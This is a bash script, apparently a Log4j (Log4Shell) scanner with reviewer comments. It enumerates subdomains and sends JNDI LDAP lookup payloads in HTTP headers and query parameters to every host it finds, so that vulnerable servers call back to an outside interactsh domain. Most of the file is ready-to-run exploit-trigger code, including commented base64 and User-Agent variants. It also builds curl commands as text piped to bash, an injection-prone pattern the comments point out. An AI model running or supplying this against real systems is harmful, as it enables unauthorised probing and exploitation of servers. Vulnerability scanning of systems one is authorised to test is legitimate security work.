#! /bin/bash
# ________ ___ ___ ________ _____ ______ ________ ________
#|\ ____\|\ \|\ \|\ __ \|\ _ \ _ \|\ __ \|\ __ \
#\ \ \___|\ \ \\\ \ \ \|\ \ \ \\\__\ \ \ \ \|\ \ \ \|\ \
# \ \_____ \ \ __ \ \ __ \ \ \\|__| \ \ \ \\\ \ \ \\\ \
# \|____|\ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \ \\\ \ \ \\\ \
# ____\_\ \ \__\ \__\ \__\ \__\ \__\ \ \__\ \_______\ \_______\
# |\_________\|__|\|__|\|__|\|__|\|__| \|__|\|_______|\|_______|
# \|_________|
#
# github: https://github.com/shamo0
# Report a missing prerequisite.
# Arguments: $1 - name of the command to look up with `command -v`
# Outputs:   the name (wrapped in tput colour codes) on stdout when the
#            command cannot be resolved; nothing when it is available
doesCommandExist() {
  if ! command -v "$1" >/dev/null 2>&1; then
    echo -e "$(tput setaf 3)$1 $(tput sgr0)"
  fi
}
# Print the "requirements missing" banner for domain mode.
# Looks up curl, httpx, assetfinder, subfinder and amass with `command -v`;
# as soon as one of them cannot be resolved the three warning lines are
# written to stdout. Prints nothing when all five are available.
domainScan-DoesCommandExistReqText() {
  local tool
  for tool in curl httpx assetfinder subfinder amass; do
    if ! command -v "$tool" >/dev/null 2>&1; then
      echo -e "\n$(tput setaf 3 ; tput rev ; tput bold) ! Warning ! $(tput sgr0)"
      echo -e "$(tput setaf 3)Using this feature requires special requirements. It has been detected that the requirements are not installed on your system. $(tput sgr0)"
      echo -e "\n$(tput setaf 3 ; tput bold)Please install these tools: $(tput sgr0)"
      return
    fi
  done
}
# Stop the script when a domain-mode prerequisite is missing.
# Checks curl, httpx, assetfinder, subfinder and amass with `command -v`.
# Returns normally when all are present; otherwise terminates the shell.
domainScan-DoesCommandExistReqExit() {
  local tool
  for tool in curl httpx assetfinder subfinder amass; do
    if ! command -v "$tool" >/dev/null 2>&1; then
      # The exit status is 0 even though a prerequisite is missing.
      exit 0
    fi
  done
}
# Print the "requirements missing" banner for list mode.
# List mode only needs curl and httpx; when either cannot be resolved with
# `command -v` the three warning lines go to stdout, otherwise nothing does.
listScan-DoesCommandExistReqText() {
  if ! command -v "curl" >/dev/null 2>&1 || ! command -v "httpx" >/dev/null 2>&1; then
    echo -e "\n$(tput setaf 3 ; tput rev ; tput bold) ! Warning ! $(tput sgr0)"
    echo -e "$(tput setaf 3)Using this feature requires special requirements. It has been detected that the requirements are not installed on your system. $(tput sgr0)"
    echo -e "\n$(tput setaf 3 ; tput bold)Please install these tools: $(tput sgr0)"
  fi
}
# Stop the script when a list-mode prerequisite (curl or httpx) is missing.
# Returns normally when both resolve via `command -v`.
listScan-DoesCommandExistReqExit() {
  if ! command -v "curl" >/dev/null 2>&1 || ! command -v "httpx" >/dev/null 2>&1; then
    # The exit status is 0 even though a prerequisite is missing.
    exit 0
  fi
}
# Print a pointer to the requirements documentation.
# The line is emitted once if any of curl, httpx, assetfinder, subfinder or
# amass cannot be resolved with `command -v` (the same five-tool check is used
# for both scan modes); nothing is printed when all are present.
doesCommandExistReqMoreInfo() {
  local tool
  for tool in curl httpx assetfinder subfinder amass; do
    if ! command -v "$tool" >/dev/null 2>&1; then
      echo -e "$(tput setaf 4 ; tput bold)\n$(tput setaf 4 ; tput bold)More Info: $(tput smul)https://github.com/adilsoybali/Log4j-RCE-Scanner#requirements$(tput rmul) $(tput sgr0)\n"
      return
    fi
  done
}
# Print the usage text to stdout, wrapped in the tput colour-on / reset
# sequences. $0 is expanded inside the here-document, so the examples show
# the name the script was invoked with.
showHelp() {
  local colour_on colour_off
  colour_on=$(tput setaf 2)
  colour_off=$(tput sgr0)
  cat << EOF
${colour_on}
Usage:
$0 -l subdomains.txt -i c6wvp482vtc10xx5bhnggdqp5neyyyyyb.interact.sh
$0 -d vulnsite.com -i c6wvp482vtc10xx5bhnggdqp5neyyyyyb.interact.sh
-h, --help Help menu
-l, --url-list List of domain/subdomain/ip to be used for scanning.
-d, --domain The domain name to which all subdomains and itself will be checked with Subfinder & Assetfinder.
-i, --inteactshdomain interactsh domain address.
${colour_off}
EOF
}
# Domain mode: enumerate hosts for $domain and send the Log4j JNDI test
# requests to each one that httpx returns.
# Globals:  domain (read), inteactshdomain (read)
# Files:    appends to ./sub.$domain
# Outputs:  progress banners and one status block per URL on stdout
domainScan() {
# Prerequisite report: banner, one line per missing tool, docs link, then
# exit if anything is missing.
domainScan-DoesCommandExistReqText
for COMMAND in "curl" "httpx" "assetfinder" "subfinder" "amass"; do
doesCommandExist "${COMMAND}"
done
doesCommandExistReqMoreInfo
domainScan-DoesCommandExistReqExit
# Enumeration results from subfinder, assetfinder and amass are appended (>>)
# to sub.$domain, de-duplicated with sort -u and fed through `httpx -silent`;
# each line httpx emits is read as $url.
# NOTE(review): the file is never truncated, so entries left by an earlier run
# are scanned again.
# NOTE(review): subfinder is given `-d sub.$domain` while assetfinder and amass
# get `$domain` - looks unintended, confirm.
# NOTE(review): $domain is unquoted throughout; `read` is used without -r.
echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Subfinder is working $(tput sgr0)\n" ; subfinder -silent -d sub.$domain >> sub.$domain ; echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Assetfinder is working $(tput sgr0)\n" ; assetfinder -subs-only $domain >> sub.$domain ; echo -e "\n$(tput setaf 2 ; tput rev ; tput bold) Amass is working $(tput sgr0)\n" ; amass enum -norecursive --silent -noalts -d $domain >> sub.$domain ; cat sub.$domain | sort -u | httpx -silent | while read url; do
# Strip the scheme, then everything from the first ':' (the port), leaving the
# host name. It is used below as the left-most label of the callback host,
# presumably so a callback can be attributed to the target that caused it.
url_without_protocol=$(echo $url | sed 's|https://||g' | sed 's|http://||g')
url_without_protocol_and_port=$(echo $url_without_protocol | sed 's|:.*||g')
# Request 1: JNDI lookup string in an X-Api-Version request header.
# NOTE(review): the curl command is assembled as text (echo + sed) and piped
# to `bash`. $url and $inteactshdomain are substituted in without escaping, so
# quotes, `;`, `$(...)`, backticks or `|` in either value would be interpreted
# by that shell or break the sed expressions. Calling curl directly with quoted
# arguments would remove the second parsing pass.
# `--insecure` turns off TLS certificate verification and the response is
# discarded, so a positive result is only visible as a callback received for
# the interactsh domain.
echo 'curl -s --insecure --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a}'|g" | sed "s|\$url|$url|g" | bash
# uncomment for testing base64 encoded ldap payload
#echo 'curl -s --insecure --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: $(echo '\${jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a}'|base64)'|g" | sed "s|\$url|$url|g" | bash
# Request 2: the same lookup string in a `test` query parameter. Here $url is
# expanded by the calling shell (it sits outside the single quotes).
# NOTE(review): the braces are backslash-escaped and doubled, presumably to get
# them past curl's URL globbing - confirm what is actually sent.
echo 'curl -s --insecure --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
# uncomment for testing base64 encoded ldap payload
#echo 'curl -s --insecure --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: $(echo '\${jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a}'|base64)'|g" | sed "s|\$url|$url|g" | bash
# Status block. NOTE(review): it lists three methods, but the User-Agent
# request above is commented out, so only the X-Api-Version header and the
# ?test= parameter are sent.
echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done
}
# List mode: send the Log4j JNDI test requests to every entry of the file
# named by $list that httpx returns.
# Globals:  list (read), inteactshdomain (read)
# Outputs:  one status block per URL on stdout
listScan() {
# Prerequisite report: banner, one line per missing tool, docs link, then
# exit if curl or httpx is missing.
listScan-DoesCommandExistReqText
for COMMAND in "curl" "httpx"; do
doesCommandExist "${COMMAND}"
done
doesCommandExistReqMoreInfo
listScan-DoesCommandExistReqExit
# The list is de-duplicated with sort -u and fed through `httpx -silent`; each
# line httpx emits is read as $url.
# NOTE(review): $list is unquoted, so a path containing spaces or glob
# characters is split/expanded before cat sees it; `read` is used without -r.
cat $list | sort -u | httpx -silent | while read url; do
# Strip the scheme, then everything from the first ':' (the port), leaving the
# host name. It is used below as the left-most label of the callback host,
# presumably so a callback can be attributed to the target that caused it.
url_without_protocol=$(echo $url | sed 's|https://||g' | sed 's|http://||g')
url_without_protocol_and_port=$(echo $url_without_protocol | sed 's|:.*||g')
# Request 1: JNDI lookup string in an X-Api-Version request header.
# NOTE(review): the curl command is assembled as text (echo + sed) and piped
# to `bash`. $url and $inteactshdomain are substituted in without escaping, so
# quotes, `;`, `$(...)`, backticks or `|` in either value would be interpreted
# by that shell or break the sed expressions. Calling curl directly with quoted
# arguments would remove the second parsing pass.
# `--insecure` turns off TLS certificate verification and the response is
# discarded, so a positive result is only visible as a callback received for
# the interactsh domain.
echo 'curl -s --insecure --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: \${jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a}'|g" | sed "s|\$url|$url|g" | bash
# uncomment for testing base64 encoded ldap payload
#echo 'curl -s --insecure --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'X-Api-Version: $(echo '\${jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a}'|base64)'|g" | sed "s|\$url|$url|g" | bash
# Request 2: the same lookup string in a `test` query parameter. Here $url is
# expanded by the calling shell (it sits outside the single quotes).
# NOTE(review): the braces are backslash-escaped and doubled, presumably to get
# them past curl's URL globbing - confirm what is actually sent.
echo 'curl -s --insecure --max-time 20 '$url/?test=log4jPayload' > /dev/null' | sed "s|log4jPayload|'\$\\\{{jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a\\\}}'|g" | sed "s|\$url|$url|g" | bash
# uncomment for testing base64 encoded ldap payload
#echo 'curl -s --insecure --max-time 20 $url -H 'log4jPayload' > /dev/null' | sed "s|log4jPayload|'User-Agent: $(echo '\${jndi:ldap://$url_without_protocol_and_port.$inteactshdomain/a}'base64)'|g" | sed "s|\$url|$url|g" | bash
# Status block. NOTE(review): it lists three methods, but the User-Agent
# request above is commented out, so only the X-Api-Version header and the
# ?test= parameter are sent.
echo -e "\033[104m[ DOMAIN ==> $url ]\033[0m" "\n" "\033[92m Method 1 ==> X-Api-Version: running-Ldap-payload" "\n" " Method 2 ==> Useragent: running-Ldap-payload" "\n" " Method 3 ==> $url/?test=running-Ldap-payload" "\n\033[0m";done
}
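# Command-line dispatch. The first option selects the scan mode and must be
# followed by its value, then -i/--inteactshdomain and the callback domain
# (fixed positions $1..$4). Any other form prints the help text and exits.
#
# The callback domain and the target domain are later spliced into command
# text that listScan/domainScan pipe to `bash`, using sed expressions with `|`
# as delimiter. They are therefore restricted to hostname characters here:
# a value containing quotes, whitespace, `;`, `$`, backticks or `|` would be
# interpreted by that shell or break the substitution. An empty value (missing
# argument) is rejected by the same check.
hostname_re='^[A-Za-z0-9._-]+$'
while [[ "$1" =~ ^- && ! "$1" == "--" ]]; do
  case $1 in
    -l | --url-list)
      list="$2"
      if [[ "$3" == "-i" || "$3" == "--inteactshdomain" ]]; then
        inteactshdomain="$4"
      else
        showHelp
        exit
      fi
      if [[ ! "$inteactshdomain" =~ $hostname_re ]]; then
        echo "Invalid interactsh domain: only letters, digits, '.', '_' and '-' are accepted." >&2
        exit 1
      fi
      listScan
      exit
      ;;
    -d | --domain)
      domain="$2"
      if [[ "$3" == "-i" || "$3" == "--inteactshdomain" ]]; then
        inteactshdomain="$4"
      else
        showHelp
        exit
      fi
      if [[ ! "$domain" =~ $hostname_re ]]; then
        echo "Invalid domain: only letters, digits, '.', '_' and '-' are accepted." >&2
        exit 1
      fi
      if [[ ! "$inteactshdomain" =~ $hostname_re ]]; then
        echo "Invalid interactsh domain: only letters, digits, '.', '_' and '-' are accepted." >&2
        exit 1
      fi
      domainScan
      exit
      ;;
    *)
      # Includes -h/--help: every unrecognised option shows the usage text.
      showHelp
      exit
      ;;
  esac
  shift
done
# Reached only when no option was given (or the first argument is `--`).
if [[ "$1" == '--' ]]; then
  shift
else
  showHelp
  exit
fi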